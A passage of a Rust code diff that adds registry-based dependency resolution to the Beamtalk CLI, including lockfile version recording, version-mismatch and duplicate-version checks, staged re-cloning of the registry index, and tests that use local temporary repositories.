+        name: resolved.name,
+        url: resolved.url,
+        reference: resolved.reference,
+        resolved_sha: resolved.resolved_sha,
+        registry_version: Some(version.to_string()),
+    });
+
+    Ok(checkout_root)
+}
+
+/// Check that a fetched registry package declares the version we asked for.
+///
+/// Guards against a registry index that points a version at the wrong tag, and
+/// against a package whose tag and `beamtalk.toml` have drifted apart — either
+/// would otherwise silently build the wrong code.
+fn validate_checkout_version(
+    dep_name: &str,
+    requested: &str,
+    checkout_path: &Utf8Path,
+    url: &str,
+    reference: &GitReference,
+) -> Result<()> {
+    let manifest_path = checkout_path.join("beamtalk.toml");
+    let manifest = manifest::parse_manifest(&manifest_path).wrap_err_with(|| {
+        format!("Failed to read the manifest of registry dependency '{dep_name}'")
+    })?;
+
+    if manifest.version != requested {
+        let tag = match reference {
+            GitReference::Tag(tag) => tag.as_str(),
+            GitReference::Branch(branch) => branch.as_str(),
+            GitReference::Rev(rev) => rev.as_str(),
+        };
+        miette::bail!(
+            "Registry dependency '{dep_name}' version mismatch.\n  \
+             Requested: '{requested}' (from [dependencies] in beamtalk.toml)\n  \
+             Found:     '{}' (in {manifest_path})\n\n  \
+             The registry points version '{requested}' at '{tag}' in {url}, but that \
+             tag's package declares a different version. This is a packaging error — \
+             report it to the package maintainer.",
+            manifest.version
+        );
+    }
+
     Ok(())
 }
 
@@ -1026,6 +1146,223 @@ middle = {{ path = "{middle_str}" }}"#
         assert!(
             names.contains(&"middle"),
             "Direct path dep should be resolved: {names:?}"
+        );
+    }
+
+    // ── Registry dependencies (BT-2978) ──────────────────────────────
+    //
+    // These drive the whole path: manifest → registry index → git checkout →
+    // lockfile. The index is a plain local directory and the "remote" is a
+    // `file://` repo, so nothing here touches the network.
+    //
+    // Each test points `[registry] url` at its own index. `BEAMTALK_REGISTRY`
+    // deliberately outranks the manifest, so these assume it is unset — which
+    // holds in CI and in a normal dev shell.
+
+    /// Create a local registry index directory holding one package entry.
+    fn create_registry_index(pkg_name: &str, versions_toml: &str) -> (TempDir, Utf8PathBuf) {
+        let dir = TempDir::new().unwrap();
+        let root = Utf8PathBuf::from_path_buf(dir.path().to_path_buf()).unwrap();
+        fs::create_dir_all(root.join("packages")).unwrap();
+        fs::write(
+            root.join("packages").join(format!("{pkg_name}.toml")),
+            format!("name = \"{pkg_name}\"\n{versions_toml}"),
+        )
+        .unwrap();
+        (dir, root)
+    }
+
+    /// Create a root project whose only dependency is a registry package.
+    fn write_registry_project(
+        root: &std::path::Path,
+        index_root: &Utf8Path,
+        dep_name: &str,
+        version: &str,
+    ) {
+        fs::create_dir_all(root).unwrap();
+        write_manifest(
+            root,
+            "my_app",
+            "0.1.0",
+            &format!(
+                "[registry]\nurl = \"{index_root}\"\n\n[dependencies]\n{dep_name} = \"{version}\"\n"
+            ),
+        );
+    }
+
+    #[test]
+    fn test_registry_dep_resolves_and_writes_lockfile() {
+        let (_git_dir, url, sha) = create_git_dep_repo("my_pkg", "1.0.0", "");
+        let (_index_dir, index_root) = create_registry_index(
+            "my_pkg",
+            &format!("[[versions]]\nversion = \"1.0.0\"\ngit = \"{url}\"\n"),
+        );
+
+        let root_dir = TempDir::new().unwrap();
+        let root = root_dir.path().join("root");
+        write_registry_project(&root, &index_root, "my_pkg", "1.0.0");
+
+        let root_path = Utf8PathBuf::from_path_buf(root.clone()).unwrap();
+        let options = beamtalk_core::CompilerOptions::default();
+
+        let result = resolve_dependency_graph(&root_path, &options);
+        assert!(
+            result.is_ok(),
+            "Registry dep should resolve: {:?}",
+            result.err()
+        );
+
+        // The package was fetched into the usual dep checkout directory.
+        let layout = crate::commands::build_layout::BuildLayout::new(&root_path);
+        assert!(
+            layout
+                .dep_checkout_dir("my_pkg")
+                .join("beamtalk.toml")
+                .exists(),
+            "Registry dep should be checked out under _build/deps/"
+        );
+
+        // The lockfile records the registry version alongside the git pin.
+        let lock_content = fs::read_to_string(root.join("beamtalk.lock")).unwrap();
+        assert!(lock_content.contains("name = \"my_pkg\""), "{lock_content}");
+        assert!(
+            lock_content.contains("version = \"1.0.0\""),
+            "lockfile should record the registry version: {lock_content}"
+        );
+        assert!(
+            lock_content.contains("reference = \"tag:v1.0.0\""),
+            "tag should default to v{{version}}: {lock_content}"
+        );
+        assert!(lock_content.contains(&sha), "{lock_content}");
+    }
+
+    #[test]
+    fn test_registry_dep_lockfile_round_trip() {
+        let (_git_dir, url, _sha) = create_git_dep_repo("my_pkg", "1.0.0", "");
+        let (_index_dir, index_root) = create_registry_index(
+            "my_pkg",
+            &format!("[[versions]]\nversion = \"1.0.0\"\ngit = \"{url}\"\n"),
+        );
+
+        let root_dir = TempDir::new().unwrap();
+        let root = root_dir.path().join("root");
+        write_registry_project(&root, &index_root, "my_pkg", "1.0.0");
+        let root_path = Utf8PathBuf::from_path_buf(root.clone()).unwrap();
+
+        resolve_dependency_graph(&root_path, &beamtalk_core::CompilerOptions::default()).unwrap();
+
+        // Reading the lockfile back preserves the registry version.
+        let lock = Lockfile::read(&root_path).unwrap().unwrap();
+        let entry = lock.get("my_pkg").unwrap();
+        assert_eq!(entry.registry_version.as_deref(), Some("1.0.0"));
+        assert_eq!(entry.reference, GitReference::Tag("v1.0.0".to_string()));
+
+        // And re-serializing is stable.
+        let reparsed = Lockfile::parse(&lock.serialize()).unwrap();
+        assert_eq!(reparsed, lock);
+    }
+
+    #[test]
+    fn test_registry_dep_resolves_from_lockfile_without_index() {
+        let (_git_dir, url, _sha) = create_git_dep_repo("my_pkg", "1.0.0", "");
+        let (index_dir, index_root) = create_registry_index(
+            "my_pkg",
+            &format!("[[versions]]\nversion = \"1.0.0\"\ngit = \"{url}\"\n"),
+        );
+
+        let root_dir = TempDir::new().unwrap();
+        let root = root_dir.path().join("root");
+        write_registry_project(&root, &index_root, "my_pkg", "1.0.0");
+        let root_path = Utf8PathBuf::from_path_buf(root.clone()).unwrap();
+        let options = beamtalk_core::CompilerOptions::default();
+
+        // First resolve populates the lockfile and the checkout.
+        resolve_dependency_graph(&root_path, &options).unwrap();
+        assert!(root.join("beamtalk.lock").exists());
+
+        // Destroy the index entirely — a locked build must not need it.
+        index_dir.close().unwrap();
+        assert!(!index_root.exists(), "index should be gone");
+
+        let result = resolve_dependency_graph(&root_path, &options);
+        assert!(
+            result.is_ok(),
+            "A lockfile hit should bypass the registry index: {:?}",
+            result.err()
+        );
+    }
+
+    #[test]
+    fn test_registry_dep_version_mismatch_is_an_error() {
+        // The repo's package declares 0.1.0, but the index advertises the same
+        // tag as version 2.0.0 — a packaging error we must not build through.
+        let (_git_dir, url, _sha) = create_git_dep_repo("my_pkg", "0.1.0", "");
+        let (_index_dir, index_root) = create_registry_index(
+            "my_pkg",
+            &format!("[[versions]]\nversion = \"2.0.0\"\ngit = \"{url}\"\ntag = \"v1.0.0\"\n"),
+        );
+
+        let root_dir = TempDir::new().unwrap();
+        let root = root_dir.path().join("root");
+        write_registry_project(&root, &index_root, "my_pkg", "2.0.0");
+        let root_path = Utf8PathBuf::from_path_buf(root).unwrap();
+
+        let err = resolve_dependency_graph(&root_path, &beamtalk_core::CompilerOptions::default())
+            .unwrap_err();
+        let msg = format!("{err:?}")
+            .split_whitespace()
+            .collect::<Vec<_>>()
+            .join(" ");
+        assert!(msg.contains("version mismatch"), "{msg}");
+        assert!(msg.contains("Requested: '2.0.0'"), "{msg}");
+        assert!(msg.contains("Found: '0.1.0'"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dep_unknown_version_lists_available() {
+        let (_git_dir, url, _sha) = create_git_dep_repo("my_pkg", "1.0.0", "");
+        let (_index_dir, index_root) = create_registry_index(
+            "my_pkg",
+            &format!("[[versions]]\nversion = \"1.0.0\"\ngit = \"{url}\"\n"),
+        );
+
+        let root_dir = TempDir::new().unwrap();
+        let root = root_dir.path().join("root");
+        write_registry_project(&root, &index_root, "my_pkg", "9.9.9");
+        let root_path = Utf8PathBuf::from_path_buf(root).unwrap();
+
+        let err = resolve_dependency_graph(&root_path, &beamtalk_core::CompilerOptions::default())
+            .unwrap_err();
+        let msg = format!("{err:?}")
+            .split_whitespace()
+            .collect::<Vec<_>>()
+            .join(" ");
+        assert!(msg.contains("Available versions: 1.0.0"), "{msg}");
+    }
+
+    #[test]
+    fn test_registry_dep_unknown_package_errors() {
+        let (_git_dir, url, _sha) = create_git_dep_repo("my_pkg", "1.0.0", "");
+        let (_index_dir, index_root) = create_registry_index(
+            "my_pkg",
+            &format!("[[versions]]\nversion = \"1.0.0\"\ngit = \"{url}\"\n"),
+        );
+
+        let root_dir = TempDir::new().unwrap();
+        let root = root_dir.path().join("root");
+        write_registry_project(&root, &index_root, "other_pkg", "1.0.0");
+        let root_path = Utf8PathBuf::from_path_buf(root).unwrap();
+
+        let err = resolve_dependency_graph(&root_path, &beamtalk_core::CompilerOptions::default())
+            .unwrap_err();
+        let msg = format!("{err:?}")
+            .split_whitespace()
+            .collect::<Vec<_>>()
+            .join(" ");
+        assert!(msg.contains("was not found in the registry"), "{msg}");
+        assert!(
+            msg.contains("Packages in the registry: my_pkg"),
+            "should list what the index does have: {msg}"
         );
     }
 }

--- a/crates/beamtalk-cli/src/commands/deps/lockfile.rs
+++ b/crates/beamtalk-cli/src/commands/deps/lockfile.rs
@@ -24,6 +24,15 @@
 //! reference = "tag:v1.0.0"
 //! sha = "abc1234def5678..."
 //!
+//! # A registry dependency additionally records the exact version requested
+//! # in beamtalk.toml, so resolution can skip the registry index on a hit.
+//! [[package]]
+//! name = "yaml"
+//! version = "0.2.1"
+//! url = "https://github.com/jamesc/beamtalk-yaml"
+//! reference = "tag:v0.2.1"
+//! sha = "fed4321cba9876..."
+//!
 //! [[native_package]]
 //! name = "gun"
 //! version = "2.1.3"
@@ -64,6 +73,13 @@ pub struct LockEntry {
     pub reference: GitReference,
     /// The exact commit SHA this reference resolved to.
     pub resolved_sha: String,
+    /// For a registry dependency, the exact version requested in
+    /// `beamtalk.toml` (serialized as the optional `version` field).
+    ///
+    /// `None` for plain git dependencies. A lock entry whose recorded version
+    /// still matches the manifest lets resolution skip the registry index
+    /// entirely and go straight to the git checkout.
+    pub registry_version: Option<String>,
 }
 
 /// A locked native (hex.pm) dependency entry (ADR 0072 Phase 2).
@@ -104,6 +120,11 @@ struct TomlLockfile {
 #[allow(dead_code)] // Constructed by serde deserialization
 struct TomlLockEntry {
     name: String,
+    /// The registry version, when this package was resolved from the registry.
+    /// Absent in lockfiles written before registry support — old lockfiles
+    /// therefore still parse, and their entries simply carry no version.
+    #[serde(default)]
+    version: Option<String>,
     url: String,
     reference: String,
     sha: String,
@@ -223,6 +244,7 @@ impl Lockfile {
                     url: entry.url,
                     reference,
                     resolved_sha: entry.sha,
+                    registry_version: entry.version,
                 },
             );
         }
@@ -279,6 +301,9 @@ impl Lockfile {
         for entry in self.packages.values() {
             output.push_str("[[package]]\n");
             let _ = writeln!(output, "name = \"{}\"", entry.name);
+            if let Some(version) = &entry.registry_version {
+                let _ = writeln!(output, "version = \"{version}\"");
+            }
             let _ = writeln!(output, "url = \"{}\"", entry.url);
             let _ = writeln!(
                 output,
@@ -498,12 +523,14 @@ mod tests {
             url: "https://github.com/someone/beamtalk-http".to_string(),
             reference: GitReference::Branch("main".to_string()),
             resolved_sha: "fed8765cba4321fed8765cba4321fed8765cba43".to_string(),
+            registry_version: None,
         });
         lockfile.insert(LockEntry {
             name: "json".to_string(),
             url: "https://github.com/jamesc/beamtalk-json".to_string(),
             reference: GitReference::Tag("v1.0.0".to_string()),
             resolved_sha: "abc1234def5678abc1234def5678abc1234def56".to_string(),
+            registry_version: None,
         });
         lockfile
     }
@@ -528,6 +555,71 @@ mod tests {
         let parsed = Lockfile::parse(&serialized).unwrap();
 
         assert_eq!(original, parsed);
+    }
+
+    // --- Registry version field (BT-2978) ---
+
+    #[test]
+    fn test_registry_version_is_serialized_as_version() {
+        let mut lockfile = Lockfile::new();
+        lockfile.insert(LockEntry {
+            name: "yaml".to_string(),
+            url: "https://github.com/jamesc/beamtalk-yaml".to_string(),
+            reference: GitReference::Tag("v0.2.1".to_string()),
+            resolved_sha: "abc1234def5678abc1234def5678abc1234def56".to_string(),
+            registry_version: Some("0.2.1".to_string()),
+        });
+
+        let content = lockfile.serialize();
+        assert!(content.contains("version = \"0.2.1\""), "{content}");
+    }
+
+    #[test]
+    fn test_registry_version_roundtrips() {
+        let mut original = Lockfile::new();
+        original.insert(LockEntry {
+            name: "yaml".to_string(),
+            url: "https://github.com/jamesc/beamtalk-yaml".to_string(),
+            reference: GitReference::Tag("v0.2.1".to_string()),
+            resolved_sha: "abc1234def5678abc1234def5678abc1234def56".to_string(),
+            registry_version: Some("0.2.1".to_string()),
+        });
+
+        let parsed = Lockfile::parse(&original.serialize()).unwrap();
+        assert_eq!(original, parsed);
+        assert_eq!(
+            parsed.get("yaml").unwrap().registry_version.as_deref(),
+            Some("0.2.1")
+        );
+    }
+
+    #[test]
+    fn test_git_entry_omits_version_field() {
+        let content = sample_lockfile().serialize();
+        assert!(
+            !content.contains("version = "),
+            "a plain git entry should not write a version: {content}"
+        );
+    }
+
+    #[test]
+    fn test_pre_registry_lockfile_still_parses() {
+        // A lockfile written before registry support carried no `version` key.
+        let legacy = r#"
+[[package]]
+name = "json"
+url = "https://github.com/jamesc/beamtalk-json"
+reference = "tag:v1.0.0"
+sha = "abc1234def5678abc1234def5678abc1234def56"
+"#;
+
+        let parsed = Lockfile::parse(legacy).unwrap();
+        let entry = parsed.get("json").unwrap();
+        assert_eq!(
+            entry.resolved_sha,
+            "abc1234def5678abc1234def5678abc1234def56"
+        );
+        assert_eq!(entry.registry_version, None);
     }
 
     #[test]
@@ -624,12 +716,14 @@ sha = "abc123"
             url: "https://example.com/zebra".to_string(),
             reference: GitReference::Tag("v1".to_string()),
             resolved_sha: "aaa".to_string(),
+            registry_version: None,
         });
         lockfile.insert(LockEntry {
             name: "alpha".to_string(),
             url: "https://example.com/alpha".to_string(),
             reference: GitReference::Tag("v1".to_string()),
             resolved_sha: "bbb".to_string(),
+            registry_version: None,
         });
 
         let serialized = lockfile.serialize();
@@ -670,12 +764,14 @@ sha = "abc123"
             url: "https://example.com/dep".to_string(),
             reference: GitReference::Tag("v1".to_string()),
             resolved_sha: "old_sha".to_string(),
+            registry_version: None,
         });
         lockfile.insert(LockEntry {
             name: "dep".to_string(),
             url: "https://example.com/dep".to_string(),
             reference: GitReference::Tag("v2".to_string()),
             resolved_sha: "new_sha".to_string(),
+            registry_version: None,
         });
 
         assert_eq!(lockfile.packages.len(), 1);

--- a/crates/beamtalk-cli/src/commands/deps/mod.rs
+++ b/crates/beamtalk-cli/src/commands/deps/mod.rs
@@ -9,6 +9,8 @@
 //! `beamtalk.toml`. Phase 1 supports:
 //! - **Path dependencies:** local filesystem paths (for monorepo/development)
 //! - **Git dependencies:** clone repos, check out tag/branch/rev, resolve to exact SHA
+//! - **Registry dependencies:** an exact version resolved through the registry
+//!   index into a `(git url, tag)` pair, then fetched as a git dependency
 //! - **Lockfile:** `beamtalk.lock` pins exact commit SHAs for reproducible builds
 //! - **Topological ordering:** compile dependencies in correct order (leaves first)
 //! - **Cycle detection:** clear error when circular dependencies are found
@@ -19,6 +21,7 @@ pub mod git;
 pub mod graph;
 pub mod lockfile;
 pub mod path;
+pub mod registry;
 
 // Re-export commonly used items
 pub use path::collect_dep_ebin_paths;
@@ -206,7 +209,11 @@ fn discover_all_dep_roots(
                         true,
                     )
                 }
-                DependencySource::Git { .. } => (layout.dep_checkout_dir(dep_name), false),
+                // Registry deps are fetched into the same checkout directory
+                // as git deps — they *are* git deps once resolved.
+                DependencySource::Git { .. } | DependencySource::Registry { .. } => {
+                    (layout.dep_checkout_dir(dep_name), false)
+                }
             };
 
             let is_direct = direct_names.contains(dep_name.as_str());
@@ -281,26 +288,86 @@ fn collect_fresh_deps(
     Ok(resolved)
 }
 
+/// Check that every registry dependency's manifest version is the one the
+/// lockfile actually pinned.
+///
+/// A version bump in `beamtalk.toml` must force re-resolution even when the
+/// lockfile's mtime still looks current.
+fn registry_versions_match(project_root: &Utf8Path, manifest: &manifest::ParsedManifest) -> bool {
+    use beamtalk_core::compilation::DependencySource;
+
+    let requested: Vec<(&String, &String)> = manifest
+        .dependencies
+        .iter()
+        .filter_map(|(name, spec)| match &spec.source {
+            DependencySource::Registry { version } => Some((name, version)),
+            _ => None,
+        })
+        .collect();
+
+    if requested.is_empty() {
+        return true;
+    }
+
+    let lock = match lockfile::Lockfile::read(project_root) {
+        Ok(Some(lock)) => lock,
+        Ok(None) => {
+            debug!("Lockfile missing for registry deps — deps are stale");
+            return false;
+        }
+        Err(e) => {
+            debug!(error = %e, "Failed to read lockfile — deps are stale");
+            return false;
+        }
+    };
+
+    for (name, version) in requested {
+        match lock.get(name) {
+            Some(entry) if entry.registry_version.as_ref() == Some(version) => {}
+            Some(_) => {
+                debug!(
+                    dep = %name,
+                    version = %version,
+                    "Registry dep version differs from lockfile — deps are stale"
+                );
+                return false;
+            }
+            None => {
+                debug!(dep = %name, "Registry dep not in lockfile — deps are stale");
+                return false;
+            }
+        }
+    }
+
+    true
+}
+
 /// Check whether all dependencies (direct and transitive) are already
 /// resolved and compiled.
 ///
 /// Returns `true` (fresh) when:
 /// 1. All dependency ebin directories exist under `_build/deps/{name}/ebin/`
-/// 2. The lockfile exists and is newer than `beamtalk.toml` (for git deps),
-///    OR there are no git dependencies (path-only deps don't use a lockfile)
+/// 2. The lockfile exists and is newer than `beamtalk.toml` (for git and
+///    registry deps), OR there are only path dependencies (which don't use a
+///    lockfile)
+/// 3. Every registry dep's locked version still matches the manifest
 fn deps_are_fresh(project_root: &Utf8Path, manifest: &manifest::ParsedManifest) -> bool {
-    let has_git_deps = manifest.dependencies.values().any(|spec| {
+    use beamtalk_core::compilation::DependencySource;
+
+    // Registry deps resolve into git checkouts and are pinned in the lockfile
+    // just like git deps, so they carry the same lockfile requirement.
+    let has_locked_deps = manifest.dependencies.values().any(|spec| {
         matches!(
             spec.source,
-            beamtalk_core::compilation::DependencySource::Git { .. }
+            DependencySource::Git { .. } | DependencySource::Registry { .. }
         )
     });
 
-    // Check lockfile freshness for git deps
-    if has_git_deps {
+    // Check lockfile freshness for git/registry deps
+    if has_locked_deps {
         let lockfile_path = project_root.join(lockfile::LOCKFILE_NAME);
         if !lockfile_path.exists() {
-            debug!("Lockfile missing but git deps present — deps are stale");
+            debug!("Lockfile missing but git/registry deps present — deps are stale");
             return false;
         }
 
@@ -318,6 +385,13 @@ fn deps_are_fresh(project_root: &Utf8Path, manifest: &manifest::ParsedManifest) 
                     return false;
                 }
             }
+        }
+
+        // The mtime check above can miss a manifest edit that lands within the
+        // same timestamp granularity, so compare the requested registry
+        // versions against what is actually locked.
+        if !registry_versions_match(project_root, manifest) {
+            return false;
         }
     }
 
@@ -1177,5 +1251,134 @@ mod tests {
             !layout.dep_checkout_dir("leftover").exists(),
             "All deps should be removed when no deps are declared"
         );
+    }
+
+    // --- Registry dependency freshness (BT-2978) ---
+
+    /// Lay out a project with one compiled registry dep locked at
+    /// `locked_version`, whose manifest asks for `manifest_version`.
+    fn setup_registry_project(
+        temp: &TempDir,
+        manifest_version: &str,
+        locked_version: &str,
+    ) -> camino::Utf8PathBuf {
+        let root = camino::Utf8PathBuf::from_path_buf(temp.path().to_path_buf()).unwrap();
+
+        let layout = BuildLayout::new(&root);
+        let checkout = layout.dep_checkout_dir("yaml");
+        fs::create_dir_all(&checkout).unwrap();
+        fs::write(
+            checkout.join("beamtalk.toml"),
+            format!("[package]\nname = \"yaml\"\nversion = \"{locked_version}\"\n"),
+        )
+        .unwrap();
+
+        std::thread::sleep(std::time::Duration::from_millis(50));
+        create_dep_ebin_with_beam(temp.path(), "yaml");
+
+        write_manifest(
+            temp.path(),
+            "my_app",
+            "0.1.0",
+            &format!("[dependencies]\nyaml = \"{manifest_version}\"\n"),
+        );
+
+        // Lockfile must be newer than the manifest so only the version
+        // comparison can make the deps stale.
+        std::thread::sleep(std::time::Duration::from_millis(50));
+        fs::write(
+            temp.path().join("beamtalk.lock"),
+            format!(
+                "# This file is auto-generated by beamtalk. Do not edit manually.\n\n\
+                 [[package]]\n\
+                 name = \"yaml\"\n\
+                 version = \"{locked_version}\"\n\
+                 url = \"https://example.test/yaml\"\n\
+                 reference = \"tag:v{locked_version}\"\n\
+                 sha = \"abc123\"\n"
+            ),
+        )
+        .unwrap();
+
+        root
+    }
+
+    #[test]
+    fn test_registry_dep_fresh_when_locked_version_matches() {
+        let temp = TempDir::new().unwrap();
+        let root = setup_registry_project(&temp, "0.2.1", "0.2.1");
+        let parsed = manifest::parse_manifest_full(&root.join("beamtalk.toml")).unwrap();
+
+        assert!(
+            deps_are_fresh(&root, &parsed),
+            "Registry dep locked at the requested version should be fresh"
+        );
+    }
+
+    #[test]
+    fn test_registry_dep_stale_when_manifest_version_differs() {
+        let temp = TempDir::new().unwrap();
+        // Manifest asks for 0.3.0 but the lockfile pins 0.2.1.
+        let root = setup_registry_project(&temp, "0.3.0", "0.2.1");
+        let parsed = manifest::parse_manifest_full(&root.join("beamtalk.toml")).unwrap();
+
+        assert!(
+            !deps_are_fresh(&root, &parsed),
+            "A version bump in beamtalk.toml must force re-resolution"
+        );
+    }
+
+    #[test]
+    fn test_registry_dep_stale_without_lockfile() {
+        let temp = TempDir::new().unwrap();
+        let root = setup_registry_project(&temp, "0.2.1", "0.2.1");
+        fs::remove_file(temp.path().join("beamtalk.lock")).unwrap();
+        let parsed = manifest::parse_manifest_full(&root.join("beamtalk.toml")).unwrap();
+
+        assert!(
+            !deps_are_fresh(&root, &parsed),
+            "Registry deps require a lockfile, like git deps"
+        );
+    }
+
+    #[test]
+    fn test_registry_dep_stale_when_lock_entry_has_no_version() {
+        let temp = TempDir::new().unwrap();
+        let root = setup_registry_project(&temp, "0.2.1", "0.2.1");
+
+        // A pre-registry lock entry (no `version`) can't prove the pin matches.
+        fs::write(
+            temp.path().join("beamtalk.lock"),
+            "# This file is auto-generated by beamtalk. Do not edit manually.\n\n\
+             [[package]]\n\
+             name = \"yaml\"\n\
+             url = \"https://example.test/yaml\"\n\
+             reference = \"tag:v0.2.1\"\n\
+             sha = \"abc123\"\n",
+        )
+        .unwrap();
+
+        let parsed = manifest::parse_manifest_full(&root.join("beamtalk.toml")).unwrap();
+        assert!(
+            !deps_are_fresh(&root, &parsed),
+            "An unversioned lock entry should force re-resolution"
+        );
+    }
+
+    #[test]
+    fn test_discover_all_dep_roots_registry_uses_checkout_dir() {
+        let temp = TempDir::new().unwrap();
+        let root = setup_registry_project(&temp, "0.2.1", "0.2.1");
+        let parsed = manifest::parse_manifest_full(&root.join("beamtalk.toml")).unwrap();
+
+        let deps = discover_all_dep_roots(&root, &parsed).unwrap();
+        assert_eq!(deps.len(), 1);
+        assert_eq!(deps[0].name, "yaml");
+        assert_eq!(
+            deps[0].root,
+            BuildLayout::new(&root).dep_checkout_dir("yaml")
+        );
+        assert!(!deps[0].is_path_dep);
+        assert!(deps[0].is_direct);
     }
 }

--- a/crates/beamtalk-cli/src/commands/deps/path.rs
+++ b/crates/beamtalk-cli/src/commands/deps/path.rs
@@ -168,6 +168,13 @@ fn resolve_deps_recursive(
                     "Skipping git dependency (not yet implemented)"
                 );
             }
+            DependencySource::Registry { version } => {
+                debug!(
+                    dep = %name,
+                    version = %version,
+                    "Skipping registry dependency (not yet implemented)"
+                );
+            }
         }
     }
     Ok(())

--- a/crates/beamtalk-cli/src/commands/deps/registry.rs
+++ b/crates/beamtalk-cli/src/commands/deps/registry.rs
@@ -33,9 +33,10 @@
 //! 3. [`DEFAULT_REGISTRY_URL`]
 //!
 //! A value naming an existing local directory is read in place — no git, no
-//! network. Anything else is treated as a git URL and cloned into
-//! `_build/registry/index/`. The clone is refreshed only on a lookup miss
-//! (retried once) and by `beamtalk deps update`.
+//! network; a relative path is taken relative to the project root. Anything
+//! else is treated as a git URL and cloned into `_build/registry/index/`. The
+//! clone is refreshed only on a lookup miss, retried once. (Refreshing it from
+//! `beamtalk deps update` arrives with registry support for that command.)
 
 use camino::{Utf8Path, Utf8PathBuf};
 use miette::{Context, IntoDiagnostic, Result};
@@ -115,8 +116,12 @@ impl RegistryEntry {
 
 // ── Index entry TOML ─────────────────────────────────────────────────
 
+// Unknown fields are deliberately *accepted* here, unlike in `beamtalk.toml`.
+// The index is a separately versioned artifact served to clients this binary
+// does not control: the day it starts carrying `checksum`, `yanked`, or
+// `licenses`, every already-released beamtalk must keep reading it rather than
+// hard-failing on every package that adopts the new key.
 #[derive(Debug, Deserialize)]
-#[serde(deny_unknown_fields)]
 struct TomlIndexEntry {
     name: String,
     #[serde(default)]
@@ -126,7 +131,6 @@ struct TomlIndexEntry {
 }
 
 #[derive(Debug, Deserialize)]
-#[serde(deny_unknown_fields)]
 struct TomlIndexRelease {
     version: String,
     git: String,
@@ -142,8 +146,9 @@ struct TomlIndexRelease {
 ///
 /// # Errors
 ///
-/// Returns an error if the TOML is malformed, carries unknown fields, or
-/// declares a name other than `expected_name`.
+/// Returns an error if the TOML is malformed, declares a name other than
+/// `expected_name`, or lists the same version more than once. Unknown fields
+/// are accepted so a newer index format stays readable.
 pub fn parse_index_entry(expected_name: &str, content: &str) -> Result<RegistryEntry> {
     let parsed: TomlIndexEntry = toml::from_str(content)
         .into_diagnostic()
@@ -157,7 +162,7 @@ pub fn parse_index_entry(expected_name: &str, content: &str) -> Result<RegistryE
         );
     }
 
-    let versions = parsed
+    let versions: Vec<RegistryRelease> = parsed
         .versions
         .into_iter()
         .map(|r| RegistryRelease {
@@ -166,6 +171,18 @@ pub fn parse_index_entry(expected_name: &str, content: &str) -> Result<RegistryE
             git: r.git,
         })
         .collect();
+
+    // A duplicated version would otherwise resolve to whichever block happens
+    // to come first — possibly a different repository than intended.
+    for (i, release) in versions.iter().enumerate() {
+        if versions[..i].iter().any(|r| r.version == release.version) {
+            miette::bail!(
+                "Registry index entry for '{expected_name}' lists version '{}' more than once.\n  \
+                 The index is inconsistent — report this to the registry maintainer.",
+                release.version
+            );
+        }
+    }
 
     Ok(RegistryEntry {
         name: parsed.name,
@@ -181,15 +198,19 @@ pub fn parse_index_entry(expected_name: &str, content: &str) -> Result<RegistryE
 /// Priority: `BEAMTALK_REGISTRY` → `[registry] url` → [`DEFAULT_REGISTRY_URL`].
 /// A value naming an existing directory becomes [`RegistryLocation::LocalDir`];
 /// anything else is treated as a git URL.
-pub fn resolve_registry_location(registry: Option<&RegistryConfig>) -> RegistryLocation {
+pub fn resolve_registry_location(
+    project_root: &Utf8Path,
+    registry: Option<&RegistryConfig>,
+) -> RegistryLocation {
     let env_value = std::env::var(REGISTRY_ENV_VAR).ok();
-    resolve_registry_location_from(env_value.as_deref(), registry)
+    resolve_registry_location_from(project_root, env_value.as_deref(), registry)
 }
 
 /// The pure core of [`resolve_registry_location`], with the environment
 /// supplied by the caller so it can be exercised without mutating the
 /// process-wide environment.
 fn resolve_registry_location_from(
+    project_root: &Utf8Path,
     env_value: Option<&str>,
     registry: Option<&RegistryConfig>,
 ) -> RegistryLocation {
@@ -199,17 +220,28 @@ fn resolve_registry_location_from(
         .or_else(|| registry.map(|r| r.url.clone()))
         .unwrap_or_else(|| DEFAULT_REGISTRY_URL.to_string());
 
-    classify_location(&raw)
+    classify_location(project_root, &raw)
 }
 
 /// Classify a raw registry location string as a local directory or a git URL.
-fn classify_location(raw: &str) -> RegistryLocation {
+///
+/// A relative path is resolved against `project_root`, not the process working
+/// directory: the CLI, LSP and MCP servers all run with different cwds, and the
+/// same `beamtalk.toml` must name the same registry from each of them.
+fn classify_location(project_root: &Utf8Path, raw: &str) -> RegistryLocation {
     let candidate = Utf8Path::new(raw);
-    if candidate.is_dir() {
-        RegistryLocation::LocalDir(candidate.to_path_buf())
+    if candidate.is_absolute() {
+        if candidate.is_dir() {
+            return RegistryLocation::LocalDir(candidate.to_path_buf());
+        }
     } else {
-        RegistryLocation::Git(raw.to_string())
+        let joined = project_root.join(candidate);
+        if joined.is_dir() {
+            return RegistryLocation::LocalDir(joined);
+        }
     }
+
+    RegistryLocation::Git(raw.to_string())
 }
 
 // ── Index materialisation ────────────────────────────────────────────
@@ -251,7 +283,9 @@ pub fn ensure_index(
 fn ensure_git_index(url: &str, project_root: &Utf8Path, refresh: bool) -> Result<Utf8PathBuf> {
     let index_dir = BuildLayout::new(project_root).registry_index_dir();
 
-    if index_dir.join("packages").is_dir() {
+    let has_index = index_dir.join("packages").is_dir();
+
+    if has_index {
         if !refresh {
             debug!(%index_dir, "Using existing registry index");
             return Ok(index_dir);
@@ -264,8 +298,57 @@ fn ensure_git_index(url: &str, project_root: &Utf8Path, refresh: bool) -> Result
         debug!(%index_dir, "Fast-forward failed, re-cloning registry index");
     }
 
-    clone_index(url, &index_dir)?;
-    Ok(index_dir)
+    // Clone into a scratch directory and swap it in only once it is complete.
+    // A refresh that fails (offline, VPN down, transient DNS) must leave the
+    // usable index that is already on disk exactly where it was, rather than
+    // deleting it up front and then failing to replace it.
+    let staging_dir = BuildLayout::new(project_root)
+        .registry_dir()
+        .join("index.staging");
+
+    match clone_index(url, &staging_dir) {
+        Ok(()) => {
+            swap_in_index(&staging_dir, &index_dir)?;
+            Ok(index_dir)
+        }
+        Err(e) => {
+            let _ = std::fs::remove_dir_all(&staging_dir);
+            if has_index {
+                // Keep serving the stale index — a refresh is best-effort, and
+                // the lookup that triggered it reports its own error if the
+                // package really is absent.
+                debug!(%index_dir, error = %e, "Registry refresh failed, keeping existing index");
+                Ok(index_dir)
+            } else {
+                Err(e)
+            }
+        }
+    }
+}
+
+/// Replace `index_dir` with the freshly cloned `staging_dir`.
+fn swap_in_index(staging_dir: &Utf8Path, index_dir: &Utf8Path) -> Result<()> {
